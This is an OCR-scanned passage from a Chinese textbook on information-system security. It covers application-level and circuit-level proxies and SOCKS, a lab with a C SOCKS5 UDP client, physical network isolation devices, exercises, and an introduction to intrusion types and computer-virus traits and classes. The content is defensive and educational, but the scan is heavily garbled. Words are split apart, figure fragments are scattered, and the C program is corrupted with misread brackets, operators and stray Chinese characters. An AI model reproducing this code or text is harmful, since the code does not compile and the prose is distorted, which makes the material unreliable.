没有 通用 的 安全 机 制 和 安全 规则 描述 ,通用 性 差 ,对 不 同 的 应 用 具有 很 强 的 针对 性 和 专 
期 性 。 
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图 3.16 应 用 级 代理 工作 原理 
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图 3. 17 为 应 用 级 代理 的 基本 工作 过 程 。 
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图 3.17 应 用 级 代理 的 基本 工作 过 程 


应 用 级 代理 具有 如 下 一 些 功 能 。 

(1) 阻 断路 由 与 URL 

代理 服务 是 一 种 服务 程序 , 它 位 于 客户 机 与 服务 器 之 间 , 完 全 阻挡 了 二 者 间 的 数据 交 
流 。 从 客户 机 来 看 ,代理 服务 器 相当 于 一 台 真 正 的 服务 器 ;而 从 服务 器 来 看 ,代理 服务 器 又 
是 一 台 真 正 的 客户 机 。 当 客户 机 需要 使 用 服务 器 上 的 数据 时 ,首先 将 数据 请 求 发 给 代理 服 
务 器 ,代理 服务 器 再 根据 这 一 请 求 向 服务 器 索取 数据 ,然后 再 由 代理 服务 器 将 数据 传输 给 客 
户 机 。 由 于 外 部 系统 与 内 部 服务 器 之 间 没 有 直接 的 数据 通道 ,外 部 的 恶意 侵害 也 就 很 难 伤 
害 到 内 部 网 络 系统 。 

(2) 隐藏 客户 

应 用 级 代理 既 可 以 隐藏 内 部 IP 地 址 ,又 可 以 给 单个 用 户 授 权 , 即 使 攻击 者 盗用 了 一 个 
合法 的 IP 地 址 ,也 通 不 过 严格 的 身份 认证 。 因 此 应 用 级 代理 比 数据 包 过 滤 具 有 更 高 的 安全 
性 。 但 是 这 种 认证 使 得 应 用 网 关 不 透明 ,用 户 每 次 连接 都 要 受到 认证 ,这 给 用 户 带 来 许多 不 
便 。 这 种 代理 技术 需要 为 每 个 应 用 编写 专门 的 程序 。 

(3) 安全 监控 

代理 保证 所 有 内 容 都 经 过 单一 的 一 个 点 ,该 点 成 为 网 络 数据 的 一 个 检查 点 。 在 应 用 级 
代理 提供 授权 检查 及 代理 服务 。 大 多 数 代 理 软件 具有 对 过 往 的 数据 包 进 行 分 析 监 控 .注册 
登记 .过 滤 .记录 和 报告 等 功能 。 当 外 部 某 台 主机 试图 访问 受 保护 网 络 时 ,必须 先 在 代理 上 
经 过 身份 认证 。 通 过 身份 认证 后 ,再 运行 一 个 专门 为 该 网 络 设计 的 程序 ,把 外 部 主机 与 内 部 
主机 连接 。 在 这 个 过 程 中 ,可 以 限制 用 户 访问 的 主机 、 访 问 的 时 间 及 访问 的 方式 ,并 进行 记 
录 和 监控 。 同 样 , 受 保护 网 络 内 部 用 户 访问 外 部 网 时 也 需 先 登录 到 代理 上 ,通过 验证 后 才 可 
访问 。 

由 于 应 用 级 代理 像 横 在 客户 与 服务 器 连通 路 径 上 的 一 个 关口 ,所 以 也 称 为 应 用 级 网 关 。 
由 于 应 用 级 代理 像 横 在 客户 与 服务 器 连通 路 径 上 的 一 堵 墙 ,所 以 也 称 为 应 用 级 防火 墙 。 


2. 电路 级 代理 


电路 级 代理 也 称 电 路 级 网 关 , 工 作 在 会 话 层 ,进行 会 话 层 的 过 滤 。 在 TCP/IP 体系 中 ， 
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电路 级 网 关 依 赖 于 TCP 连接 ,如 图 3. 18 所 示 , 它 只 用 来 在 两 个 端点 之 间 进 行 转 接 , 只 对 数 
据 包 进行 转发 ,进行 简单 的 字 节 复制 式 的 数据 包 转 接 , 而 数据 包 处 理 要 在 应 用 层 进行 。 


TCP 端 口 TCP 端 口 


传输 层 
网 络 层 
数据 链 路 /物理 层 


图 3.18 电路 级 网 关 工 作 原理 


电路 级 网 关 对 外 像 一 个 代理 ,对 内 又 像 一 个 过 滤器 。 这 种 特点 使 它 可 以 适用 于 多 个 协 
议 ,为 各 种 不 同 的 协议 提供 服务 ,但 它 不 能 解释 应 用 协议 。 简 单 的 电路 级 网 关 仅 传输 TCP 
的 数据 段 ,增强 的 电路 级 网 关 还 具有 认证 作用 。 

SOCKS 协议 ( 套 接 字 协 议 ) 是 一 个 电路 级 网 关 协 议 , 它 主要 由 两 部 分 组 成 : 

(1) SOCKS 客户 程序 : 经 过 修改 的 Internet 客户 程序 ,改造 的 目的 是 使 运行 客户 程序 
的 主机 从 与 Internet 通信 改 为 与 运行 SOCKS 代理 的 主机 通信 。 

(2) SOCKS 服务 程序 : 既 可 以 Internet 通信 又 可 以 和 内 部 网 络 通信 的 程序 。 

SOCKS 代理 的 工作 过 程 如 下 : 

Q@ 当 一 个 经 过 SOCKS 化 的 客户 程序 要 连接 到 Internet 时 ,SOCKS 就 会 截获 这 个 连 
接 , 将 之 连接 到 运行 SOCKS 服务 器 的 主机 上 。 

@ 连接 建立 后 ,SOCKS 客户 程序 发 送 如 下 信息 : 

。 版 本 号 ; 

。 连接 请 求 命令 ; 

。 客户 端 端口 号 ; 

。 发 起 连接 的 用 户 名 。 

@ 经 过 确认 后 ,SOCKS 服务 器 才 与 外 部 的 服务 器 建立 连接 。 

对 用 户 来 说 , 受 保 护 网 与 外 部 网 的 信息 交换 是 透明 的 ,感觉 不 到 代理 的 存在 , 那 是 因为 
网 络 用 户 不 需要 登录 到 代理 上 。 但 是 客户 端的 应 用 软件 必须 支持 Socketsified API, 受 保护 
网 络 用 户 访问 公共 网 所 使 用 的 IP 地 址 也 都 是 代理 服务 器 的 IP 地 址 。 


实验 10 代理 服务 器 的 配置 及 功能 分 析 


1. 实验 目的 


(1) 掌握 代理 服务 器 的 配置 方法 。 
(2) 理解 代理 服务 器 的 功能 。 


2. 实验 内 容 


(1) 进行 代理 服务 器 的 配置 操作 。 
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(2) 观察 代理 服务 器 对 内 部 计算 机 的 隐藏 作用 。 
(3) 分 析 下 面 的 一 个 代理 服务 器 程序 的 结构 ,演示 它们 的 功能 。 


#include 二 windows. h> 
#include 过 stdio. b> 
#define PROXY_IP "xxx. xxxX.。 XXX。 XXX 
#define PROXY_PORT 1080 
# define DEST_IP "xxx. xxx。 XxXXx. XXX 
# define DEST_PORT 8888 
# define LOCAL _IP "xxx. xxx. XXX。 xxx" 
# define LOCAL_PORT 6666 
int main() 
{ 
int fd, fd_udp; 
struct sockaddr_in name; 
WSADATA wsaData; 
char buf[100]; 
int len; 
int i; 
if{(WSAStartup( MAKEWORD( 2, 2 ) ，& wsaData )) 
return 1; 
if((fd_udp = socket(AF_INET, SOCK_DGRAM. 0)) == —1) 
return 1; 
if((fd = socket(AF_INET, SOCK_STREAM, 0)) == 一 1) 
return 1; 
memset( &name, 0, sizeof(name)); 
name. sin_family = AF_INET:; 
name. sin_addr. s_addr = inet_addr(PROXY _IP); 
name. sin_port = htons(PROXY_PORT); 
if(connect(fd, (struct sockaddr * ) &.name, sizeof(name)) != 0) 
return 1; 
buf[0] = 5; 
buf[1] = 1; 
bufL2] = 0; 
send(fd, buf, 3, 0); 
recv(fd, buf, 2, 0); 
if(buf[0] != 51 buf[1] != 0) 


return 1; 
buf[0] = 5; / #* protocol version x*/ 
bufL1] = 3; /¥* command UDP associate */ 
buf[2] = 0; /* reserved 针 儿 
buff3] = 1; /* address type IPv4 ¥ 人 4 


len = sizeof(name); 


memset( &name, 0, sizeof(name)); 
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name. sin_family = AF_INET; 
name. sin_addr. s_addr = inet_addr(LOCAL_IP) 
name. sin_port = htons(LOCAL _PORT); 
bind(fd_udp, (struct sockaddr * )&name,len); 
x* (unsigned int * ) &buf[4] = inet_addr(LOCAL _IP);//name. sin_addr. s_addr; 
x* (unsigned short * )&buf[8] = htons(LOCAL_PORT); 
send(fd, buf, 10, 0); 
recv(fd, buf, 10, 0); 
if(buf[0] != 5) 
return 11; 
memset( &name, 0, sizeof(name)); 
name. sin_family = AF_INET; 
name. sin_addr. s_addr = * (int * )&buf[4]; 
name. sin_port = (x (short* )&buf[8]); 
connect({fd_udp, (struct sockaddr * )&name, sizeof(name)); 
for(i = 0; i =<100; i 十 十 ) 
{ 
buf[0] = 0; /* reserved */ 
buf[L1] = 0; /* reserved */ 
buf[2] = 0; /* standalone packet */ 
buf[3] = 1; /* address type IPv4 */ 
* (unsigned long * ) &buf[4] = inet_addr(DEST_IP); 
x* (unsigned short * )&buf[8] = htons(DEST_PORT); 
< (unsigned int * )&-buf[10] = i; 
send(fd_udp, buf, 14, 0); 
recv({fd_udp, buf, 14, 0); 
printf("udp received: % d\n", * (int* )&buff10]); 
; 
closesocket({d_udp); 
closesocket (fd) ; 
WSACleanupO); 


return 0; 


3. 建议 环境 
在 一 种 操作 系统 (如 Linux) 中 进行 代理 服务 器 配置 。 
4. 实验 准备 


(1) 设计 观察 代理 服务 器 功能 的 方案 。 例 如 ,以 机 器 A 作为 机 器 B 的 代理 服务 器 , 然 
后 观察 : 
。 从 机 器 C 上 ping 机 器 B 和 机 器 A 观察 到 的 现象 ; 
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。， 用 机 器 B 和 机 器 Aping 机 器 C 观察 到 的 现象 

。 从 机 器 B 上 网 浏览 的 情形 。 

(2) 设计 进行 代理 服务 器 配置 的 步骤 (高 级 功能 都 应 在 配置 文件 中 以 命令 行 的 方式 
设 定 ) 。 

(3) 对 给 出 的 代理 服务 器 程序 进行 分 析 、 调 试 ,预测 其 功能 。 


5. 推荐 的 分 析 讨 论 内 容 


(1) 代理 服务 器 如 何 实现 对 内 部 计算 机 的 隐藏 作用 ? 
(2) 其 他 发 现 或 想到 的 问题 。 


3.3 网 络 的 物理 隔离 


3.3.1 物理 隔离 的 概念 


物理 隔离 是 随 着 “政府 上 网 ”热潮 而 出 现 的 一 项 技术 。 政 府 上 网 不 仅 表明 Internet 已 经 
进入 了 一 个 非常 重要 的 领域 ,而 且 为 信息 系统 安全 技术 提出 了 新 的 课题 。 政 府 是 社会 信息 
资源 的 最 大 占有 者 和 集散 地 , 它 拥 有 大 量 国民 关心 的 信息 ,也 拥有 大 量 敏感 的 和 机 密 的 数 
据 。 单 纯 的 逻辑 隔离 已 经 难于 控制 技术 高 超 者 的 攻击 。 为 此 ,国家 保密 局 2000 年 1 月 1 日 
起 实施 的 《计算 机 信息 系统 国际 联网 保密 管理 规定 》 第 二 章 第 六 条 要 求 :“ 涉 及 国家 机 密 的 
计算 机 信息 系统 ,不 得 直接 或 间接 地 与 国际 互联 网 或 其 他 公共 信息 网 络 相连 接 , 必 须 实行 物 

最 初 的 物理 隔离 是 建立 两 套 网 络 系统 和 计算 机 设备 : 一 套用 于 内 部 办 公 , 一 套用 于 与 
Internet 连接 。 这 样 的 两 套 互 不 连接 的 系统 ,不 仅 成 本 高 ,而 且 极为 不 便 。 这 一 矛盾 促进 了 
物理 隔离 设备 的 开发 ,也 迫切 需要 一 套 技术 标准 和 方案 。 

《国家 信息 化 领导 小 组 关于 我 国电 子 政务 建设 的 指导 意见 》(2002 年 8 月 15 日 ,中 办 17 
号 文件 ) 提 出 了 “十 五 ”期 间 我 国电 子 政务 建设 的 主要 任务 之 一 是 :“ 建 设 和 整合 统一 的 电子 
政务 网 络 。 为 适应 业务 发 展 和 安全 保密 的 要 求 , 有 效 过 制 重复 建设 ,要 加 快 建设 和 整合 统一 
的 网 络 平台 。 电 子 政务 网 络 由 政务 内 网 和 政务 外 网 构成 ,两 网 之 间 物 理 隔 离 , 政 务 外 网 与 
Internet 之 间 逻 辑 隔离 。 政 务 内 网 主要 是 副 省 级 以 上 政务 部 门 的 办 公 网 ,与 副 省 级 以 下 政 
务 部 门 的 办 公 网 物理 隔离 。 政 务 外 网 是 政府 的 业务 专 网 ,主要 运行 政务 部 门面 向 社会 的 专 
业 性 服务 业务 和 不 需 在 内 网 上 运行 的 业务 。 要 统一 标准 ,利用 统一 平台 ,促进 各 个 业务 系统 
的 互联 互通 和 资源 共享 。 要 用 一 年 左右 的 时 间 , 基 本 形成 统一 的 电子 政务 内 外 网 络 平台 ,在 
运行 中 逐步 完善 。” 

如 图 3. 19 所 示 , 政 务 网 应 当 跨 越 公 网 、 外 网 和 内 部 网 。 所 谓 物理 隔离 ,是 指 内 部 网 络 与 
外 部 网 络 在 物理 上 没有 相互 连接 的 通道 ,两 个 系统 在 物理 上 完全 独立 。 要 实现 公众 信息 网 
(外 部 网 ) 与 内 部 网 络 物理 隔离 的 目的 ,必须 保证 做 到 以 下 几 点 : 

(1) 在 物理 传导 上 使 内 外 网 络 隔断 ,确保 外 部 网 不 能 通过 网 络 连接 侵入 内 部 网 ;同时 防 
止 内 部 网 信息 通过 网 络 连 接 泄漏 到 外 部 网 。 
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图 3. 19 电子 政务 的 三 网 


(2) 在 物理 辐射 上 隔断 内 部 网 与 外 部 网 ,确保 内 部 网 信息 不 会 通过 电磁 辐射 或 耦合 方 
式 泄漏 到 外 部 网 。 

(3) 在 物理 存储 上 隔断 两 个 网 络 环境 ,对 于 断 电 后 会 遗失 信息 的 部 件 , 如 内 存 、 处 理 器 
等 暂 存 部 件 , 要 在 网 络 转 换 时 作 清 除 处 理 , 防 止 残留 信息 串 网 ;对 于 断 电 非 遗失 性 设备 ,如 磁 
带 机 、 硬 盘 等 存储 设备 ,内 部 网 与 外 部 网 信息 要 分 开 存 储 。 

从 隔离 的 内 容 看 ,隔离 分 为 网 络 隔离 和 数据 隔离 ; 

“数据 隔离 主要 是 指 存储 设备 的 隔离 一 一 一 个 存储 设备 不 能 被 几 个 网 络 共享 。 

。 网 络 隔离 就 是 把 被 保护 的 网 络 从 公开 的 ,无 边界 的 自由 的 环境 中 独立 出 来 。 

只 有 实现 了 两 种 隔离 , 才 是 真正 意义 上 的 物理 隔离 。 


3.3.2 网 络 物理 隔离 技术 
目前 ,物理 隔离 技术 主要 有 3 种 : 网 络 安全 隔离 卡 、 网 络 安全 隔离 集线器 和 网 闸 。 
1. 网 络 安全 隔离 卡 


网 络 安全 隔离 卡 是 一 个 硬件 插 卡 ,可 以 在 物理 上 将 计算 机 划分 成 两 个 独立 的 部 分 ,每 一 
部 分 都 有 自己 的 “虚拟 ”硬盘 。 网 络 安全 隔离 卡 设置 在 PC 最 低层 的 物理 部 件 上 , 卡 的 一 边 
通过 IDE 总 线 连接 主板 , 另 一 边 连接 IDE 硬盘 。PC 的 硬盘 被 分 割 成 两 个 物理 区 : 

。 安全 区 ,只 与 内 部 网 络 连 接 ; 

。 公共 区 ,只 与 外 部 网 络 连 接 。 

如 图 3. 20 所 示 ,网络 安 全 隔离 卡 既 连接 内 网 又 连接 外 网 ,就 像 一 个 分 接 开关 ,在 两 个 网 
上 分 时 地 工作 ,任何 时 刻 计算 机 只 能 与 一 个 数据 分 区 以 及 相应 的 网 络 连通 。 于 是 计算 机 也 
因此 被 分 为 安全 模式 和 公共 模式 ,并 且 某 一 时 刻 只 可 以 在 一 个 模式 下 工作 。 

内 部 网 络 


网 络 安全 隔离 卡 


连接 外 部 网 络 
图 3.20 网络 安全 隔离 卡 的 工作 方式 


。 在 安全 状态 时 ,主机 只 能 使 用 硬盘 的 安全 区 与 内 部 网 连接 ,此 时 外 部 网 是 断 开 的 , 硬 
盘 的 公共 区 也 是 封闭 的 。 
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。 在 公共 状态 时 ,主机 只 能 使 用 硬盘 的 公共 区 与 外 网 连接 ,此 时 与 内 网 是 断 开 的 , 且 硬 
盘 的 安全 区 是 封闭 的 。 
两 个 状态 各 有 自己 独立 的 操作 系统 ,并 分 别 导 入 ,保证 两 个 硬盘 不 会 同时 被 激活 。 两 个 
分 区 不 可 以 直接 交换 数据 ,但 是 可 以 通过 专门 设置 的 中 间 功 能 区 进行 ,或 通过 设置 的 安全 通 
道 使 数据 由 公共 区 向 安全 区 转移 (不 可 逆向 ) 。 
两 个 状态 转换 时 ,所 有 的 临时 数据 都 会 被 彻底 删除 。 


2. 网 络 安全 隔离 集线器 


如 图 3. 21 所 示 ,网 络 安全 隔离 集线器 是 一 种 多 路 开关 切换 设备 。 它 与 网 络 安全 隔离 卡 
配合 使 用 ,并 通过 对 网 络 安全 隔离 卡 上 发 出 的 特殊 信号 的 检测 ,识别 出 所 连接 的 计算 机 , 自 
动 将 其 网 线 切 换 到 相应 的 网 络 的 hub 上 ,从 而 实现 多 台独 立 的 安全 计算 机 与 内 ,外 两 个 网 
络 的 安全 连接 与 自动 切换 。 如 果 没 有 检测 到 来 自 网 络 安全 隔离 卡 的 信号 ,两 个 网 络 都 会 被 
切断 。 这 样 减少 了 安全 区 的 工作 站 被 错误 地 尚未 分 类 网 络 的 风险 。 


内 网 hub 隔离 集线器 


外 网 hub 


图 3.21 网 络 安全 隔离 集线器 的 工作 原理 


网 络 安全 隔离 集线器 只 有 采取 与 其 他 设备 隔离 的 措施 ,如 物理 隔离 卡 等 相配 合 ,才能 实 
现 真正 的 物理 隔离 。 如 果 只 切换 内 、 外 网 且 变更 IP 地 址 ,而 不 重新 启动 系统 , 则 不 是 真正 的 
物理 隔离 。 


3. 网 闸 


网 闸 的 工作 原理 如 图 3. 22 所 示 。 它 采用 一 个 类 似 闻 门 的 装置 连接 两 个 网 络 ,一 个 是 安 
全 的 网 络 ,一 个 是 非 安全 的 网 络 ,分 时 地 使 用 两 套 系统 中 的 数据 通路 : 当 存储 介质 与 安全 的 
网 络 连接 时 ,就 断 开 与 非 安全 网 络 的 连接 ; 当 存储 介质 与 非 安全 的 网 络 连接 时 ,就 断 开 与 安 
全 网 络 的 连接 。 存 储 截止 通过 分 时 地 连接 两 个 网 络 实现 数据 交换 。 


re 

存储 介质 上 
外 网 服务 器 内 网 服务 器 
图 3.22 网 闸 工 作 原 理 
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习 题 


1. 在 信息 系统 内 主体 通常 指 什么 ?客体 通常 指 什么 ? 

2. 查找 资料 ,分 别 给 出 几 个 自主 访问 控制 .强制 访问 控制 和 基于 角色 的 访问 控制 的 
实例 。 

3. 比较 自主 访问 控制 .强制 访问 控制 和 基于 角色 的 访问 控制 。 

4. 查找 资料 ,说 明 还 有 哪些 访问 控制 策略 。 

5. 有 一 个 内 部 网 (192. 168. 20. 0) 只 与 某 一 台 外 部 主机 (172. 165. 255) 交 换 数 据 。 写 出 
位 于 它们 之 间 的 数据 包 过 滤 规 则 。 

6. 比较 包 过 滤 、 网 络 地 址 转换 和 代理 技术 的 特点 以 及 适用 的 环境 。 

7. 简 述 国内 外 物理 隔离 技术 的 现状 和 发 展 趋势 。 

8. 浏览 网 站 ,列举 国内 有 关 物 理 隔 离 设 备 的 厂家 及 其 产品 特点 。 

9. 收集 国内 外 有 关 网 络 隔 离 技术 的 网 站 信息 ,简要 说 明 各 网 站 的 特点 。 

10. 收集 国内 外 有 关 网 络 隔离 技术 的 最 新 动态 。 
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信息 系统 是 现代 社会 中 一 个 重要 的 系统 ,信息 系统 也 是 一 个 复杂 的 系统 。 这 些 重要 性 
和 神秘 感 不 断 吸引 着 竞争 对 手 的 注意 力 ,刺激 着 好 奇 者 、 好 胜 者 和 恶作剧 者 的 兴趣 。 他 们 如 
八仙 过 海 ,千方百计 地 非 授 权 地 进入 系统 ,各 取 所 需 , 各 显 其 功 。 

一 般 来 说 ,可 以 采用 信息 系统 入侵 和 攻击 的 手段 有 下 面 一 些 。 


1. 恶意 代码 攻击 


最 常见 的 恶意 代码 是 病毒 。 病 毒 是 潜入 信息 系统 中 的 一 些 程序 代码 。 这 些 代 码 可 以 在 
未 授权 的 情况 下 运行 ,或 用 来 消耗 系统 资源 ,或 用 来 搜集 系统 的 敏感 信息 ,或 产生 一 些 与 系 
统 工作 无 关 的 动作 ,或 使 系统 丧失 一 些 正 常 的 功能 。 除 了 病毒 之 外 ,还 有 其 他 类 型 的 一 些 恶 
意 代 码 , 例 如 特洛伊 木马 ,蠕虫 .细菌 、 陷 门 . 逻 辑 炸弹 等 。 它 们 之 间 的 区 别 在 于 需要 不 需要 
寄生 在 别 的 程序 上 (寄生 性 )、 有 没有 自我 复制 能 力 ( 传 染 性 ) ,以 及 执行 是 否 依 赖 某 些 条 件 
(触发 性 ) 等 特征 上 。 


2. 消息 收集 攻击 
收集 被 攻击 系统 的 敏感 信息 或 漏洞 信息 。 
3. 代码 漏洞 攻击 


任何 程序 系统 都 有 一 些 薄弱 环节 。 这 些 薄 弱 环节 可 能 来 自 设计 上 的 疏忽 ,也 可 能 来 自 
配置 或 操作 上 的 错误 ,也 可 能 来 自 系统 管理 上 的 不 足 。 系 统 的 漏洞 一 旦 被 入 侵 者 发 现 或 掌 
握 , 就 有 可 能 被 利用 向 系统 发 起 攻击 。 


4. 欺骗 和 会 话 动 持 攻击 


欺骗 与 会 话 支持 也 属于 系统 漏洞 攻击 的 一 种 。 但 是 ,一 般 说 漏洞 指 操作 系统 和 其 他 系 
统 软件 中 的 薄弱 环节 ,而 欺骗 和 会 话 支持 由 于 利用 计算 机 网 络 中 的 开放 性 和 身份 认证 的 不 
完全 性 ,使 得 攻击 者 可 以 假冒 别人 身份 进行 活动 的 攻击 行为 。 


5. 分 布 式 攻击 


计算 机 网 络 本 身 是 一 种 分 布 式 计算 资源 。 分 布 式 攻击 就 是 攻击 者 利用 这 种 资源 进行 的 
系统 攻击 行为 。 例 如 利用 这 种 分 布 式 计算 资源 进行 口令 猜测 ,信息 收集 以 及 发 起 对 某 站 点 
的 “人 海战 术 ” 攻 击 。 


6. 其 他 攻击 


常言 道 , 道 高 一 尺 , 魔 高 一 丈 。 信 息 系统 安全 是 针对 入 侵 和 攻击 采取 的 一 系列 安全 策略 
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和 技术 。 然 而 ,按照 木 桶 原理 , 当 一 块 短 的 木板 被 加 长 后 , 男 一 块 次 短 的 木板 就 变 成 最 短 的 
木板 了 。 而 一 种 攻击 被 防御 之 后 ,新 的 攻击 又 会 出 现 。 防 与 攻 的 博弈 将 在 竞争 中 永 无 止境 。 


4.1 计算 机 病毒 


4.1.1 计算 机 病毒 的 特征 


在 生物 学 界 ,病毒 (virus) 是 一 类 没有 细胞 结构 但 有 遗传 .复制 等 生命 特征 ,主要 由 核酸 
和 和 蛋白 质 组 成 的 有 机 体 。 计 算 机 病毒 (computer virus) 有 一 些 与 生物 界 中 的 病毒 极为 相似 
的 特征 ,这 也 就 是 称 其 为 病毒 的 缘由 。 下 面 介绍 计算 机 病毒 的 一 些 基 本 特征 。 


1. 非 授权 执行 


通常 ,一 个 正常 的 程序 被 调用 时 ,就 要 从 系统 获得 控制 权 , 得 到 系统 分 配 的 相应 资源 ,使 
其 执行 对 用 户 是 透明 的 。 计 算 机 病毒 虽然 具有 正常 程序 所 具有 的 一 切 特性 ,但 是 其 执行 是 
非 授权 进行 的 : 它 隐蔽 在 合法 程序 和 数据 中 , 当 用 户 运行 正常 程序 时 ,病毒 伺机 取得 系统 的 
控制 权 , 先 于 正常 程序 执行 ,并 对 用 户 呈 透明 状态 。 


2. 感染 性 


与 生物 界 中 的 病毒 可 以 从 一 个 生物 体 传播 到 另 一 个 生物 体 一 样 ,传染 是 病毒 最 本 质 的 
特征 之 一 ,是 病毒 的 再 生机 制 。 在 单机 环境 下 ,计算 机 病毒 的 传染 基本 途径 是 通过 磁盘 引导 
局 区 操作 系统 文件 和 应 用 文件 进行 传染 。 在 网 络 中 ,计算 机 病毒 主要 是 通过 电子 邮件 、 
Web 页 面 等 特殊 文件 和 数据 共享 方式 进行 传染 。 


3. 潜伏 性 与 隐蔽 性 


病毒 程序 一 旦 取得 系统 控制 权 , 可 以 在 极 短 的 时 间 内 传染 大 量程 序 。 但 是 ,被 感染 的 程 
序 并 不 是 立即 表现 出 异常 ,而 是 潜伏 下 来 ,等 待 时 机 。 

计算 机 病毒 的 潜伏 还 依赖 于 其 隐蔽 性 。 为 了 隐蔽 ,病毒 通常 非常 短小 (一 般 只 有 几 百 或 
1K 字 节 ,此 外 还 寄生 于 正常 的 程序 或 磁盘 较 隐蔽 的 地 方 ,也 有 个 别 病毒 以 隐 含 文件 形式 存 
在 ,使 人 们 不 经 过 代码 分 析 很 难 被 发 觉 。 


4. 寄生 性 


在 恶意 程序 中 ,有 些 是 可 以 独立 存在 的 ,有些 则 不 能 独立 存在 。 计 算 机 病毒 就 是 一 种 不 
能 独立 存在 的 恶意 代码 。 这 也 称 为 计算 机 病毒 的 寄生 人 性。 寄生 是 计算 机 病毒 的 重要 特征 。 
计算 机 病毒 一 般 寄 生 在 可 执行 程序 中 或 者 寄生 在 硬盘 的 主 引导 扇 区 中 。 


5. 可 触发 性 


潜伏 下 来 的 计算 机 病毒 一 般 要 在 一 定 的 条 件 下 才 被 激活 ,并 发 起 攻击 。 病 毒 具有 判断 
这 个 条 件 的 功能 。 下 面 列举 一 些 病毒 的 触发 (激活 ) 条 件 。 
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。 日 期 /时 间 和 触发 : 计算 机 病毒 读 取 系统 时 钟 ,判断 是 否 激活 。 例 如 :“ 黑 色 星 期 五 ? 逢 
13 日 的 星期 五 发 作 等 ;CIH-1. 2 版 于 每 年 的 4 月 26 日 发 作 ,CIH-1.3 版 则 在 6 月 
26 日 发 作 ,CIH-1.4 版 的 发 作 日 期 则 为 每 个 月 的 26 日 。 

计数 器 触发 : 计算 机 病毒 内 部 设 定 一 个 计数 单元 ,对 系统 事件 进行 计数 ,判定 是 否 
激活 。 例 如 2708 病毒 当 系 统 启动 次 数 达 到 32 次 时 被 激活 ,发 起 对 串 、 并 口 地 址 的 
攻击 。 

键盘 触发 : 当 输 入 某 些 字符 时 触发 (如 AIDS 病毒 ,在 输入 A、I.D、S 时 发 作 ) .或 以 
击 键 次 数 (如 Devil”s Dance 病毒 在 用 户 第 2000 次 击 键 时 被 触发 ) 或 组 合 键 等 为 激 
发 条 件 (如 Invader 病毒 在 按 下 Ctrl 十 Alt 十 Del 组 合 键 时 发 作 ) 。 

启动 触发 : 以 系统 的 启动 次 数 作为 触发 条 件 。 例 如 Anti-Tei 和 Telecom 病毒 当 系 
统 第 400 次 启动 时 被 激活 。 

感染 触发 : 以 感染 文件 个 数 ,感染 序列 .感染 磁盘 数 .感染 失败 数 作为 触发 条 件 。 例 
如 ,Black Monday 病毒 在 运行 第 240 个 染 毒 程 序 时 被 激活 。VHP2 病毒 每 感染 8 
个 文件 就 会 触发 系统 热 启动 操作 等 。 

组 合 条 件 触发 : 用 多 种 条 件 综合 使 用 ,作为 计算 机 病毒 的 触发 条 件 。 


6. 破坏 性 


破坏 性 体现 了 病毒 的 杀伤 能 力 。 大 多 数 病 毒 还 具有 破坏 性 ,并 且 其 破坏 方式 总 在 花样 
翻新 。 常 见 的 病毒 破坏 性 有 : 

。 占用 或 消耗 CPU 资源 以 及 内 存 空 间 , 导 致 一 些 大 型 程序 执行 受阻 ,使 系统 性 能 

下 降 。 

。 干扰 系统 运行 ,例如 不 执行 命令 .干扰 内 部 命令 的 执行 、 虚 发 报警 信息 、 打 不 开 文件 、 
内 部 栈 溢出 ,占用 特殊 数据 区 、 时 钟 倒转 、 重 启动 .死机 、 文 件 无 法 存盘 、 文 件 存 盘 时 
丢失 字 节 、 内 存 减 小 .格式 化 硬盘 等 。 
攻击 CMOS。CMOS 是 保存 系统 参数 (如 系统 时 钟 、 磁 盘 类 型 .内存 容 量 等 ) 的 重要 
场所 。 有 的 病毒 (如 CIH 病毒 ) 可 以 通过 改写 CMOS 参数 ,破坏 系统 硬件 的 运行 。 
攻击 系统 数据 区 。 硬 盘 的 主 引导 扇 区 .boot( 引 导 ) 扇 区 .FAT( 文 件 分 配 ) 表 、 文 件 目 
录 等 是 系统 重要 的 数据 ,这 些 数据 一 旦 受 损 ,将 造成 相关 文件 的 破坏 。 
攻击 文件 。 现 在 发 现 的 病毒 中 ,大 多 数 是 文件 型 病毒 。 这 些 病毒 会 使 染 毒 文件 的 长 
度 文件 存盘 时 间 和 日 期 发 生变 化 。 
干扰 外 部 设备 运行 ,如 封锁 键盘 .产生 换 字 、 抹 掉 缓 存 区 字符 、 输 入 紊乱 、 使 屏幕 显示 
混乱 以 及 干扰 声响 .干扰 打印 机 等 。 
破坏 网 络 系统 的 正常 运行 ,例如 发 送 垃圾 邮件 .占用 带宽 ,使 网 络 拒绝 服务 等 。 


4.1.2 计算 机 病毒 分 类 


按照 不 同 的 分 类 标准 ,计算 机 病毒 可 以 分 为 不 同 的 类 型 。 下 面 介绍 几 种 常用 的 分 类 
方法 。 
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1. 按照 所 攻击 的 操作 系统 分 类 


。 DOS 病毒 : 攻击 DOS 系统 。 

。 UNIX/Linux 病毒 : 攻击 UNIX 或 Linux 系统 。 

。 Windows 病毒 : 攻击 Windows 系统 ,如 CIH 病毒 。 

。 OS/2 病毒 : 攻击 OS/2 系统 。 

。 Macintosh 病毒 : 攻击 Macintosh 系统 ,如 Mac. simpsons 病毒 。 
。 手机 病毒 。 


2. 按照 寄生 方式 和 传染 途径 分 类 


(1) 引导 型 病毒 : 引导 型 病毒 在 系统 初始 化 时 自动 装 入 内 存 , 然 后 简单 地 将 指令 指针 
(指令 计数 器 的 内 容 ) 修 改 到 一 个 存储 系统 指令 的 新 的 位 置 ,于 是 便 以 普通 方式 启动 ,而 病毒 
已 经 驻 留 在 了 内 存 。 所 以 ,不 需要 用 户 执行 磁盘 上 任何 被 感染 的 程序 ,只 要 有 访问 磁盘 的 操 
作 , 就 可 以 进行 复制 。 引 导 型 病毒 按 寄 生 对 象 可 以 分 为 : 

@O 主 引导 区 (master boot record, MBR) 病 毒 ,寄生 在 硬盘 分 区 主 引 导 程 序 所 在 的 硬盘 
的 0 柱 面 0 磁道 1 扇 区 ,也 称 分 区 病毒 ,如 大 麻 病 毒 .2708 病毒 等 。 

@ 引导 区 (boot record,BR) 病 毒 ,寄生 在 硬盘 逻辑 0 扇 区 或 软盘 逻辑 0 扇 区 , 即 0 面 0 
道 1 扇 区 ,如 Brain 病毒 和 小 球 病毒 等 。 

(2) 文件 型 病毒 : 传播 病毒 的 文件 可 以 分 为 3 类: 

@ 可 执行 文件 , 即 扩展 名 为 . COM、 EXE、 PE、. BAT、. SYS、. OVL 等 的 文件 。 一旦 
运行 这 类 病毒 的 载体 程序 ,就 会 将 病毒 注入 、 安 装 、 驻 留 在 内 存 中 ,伺机 进行 感染 。 感 染 了 该 
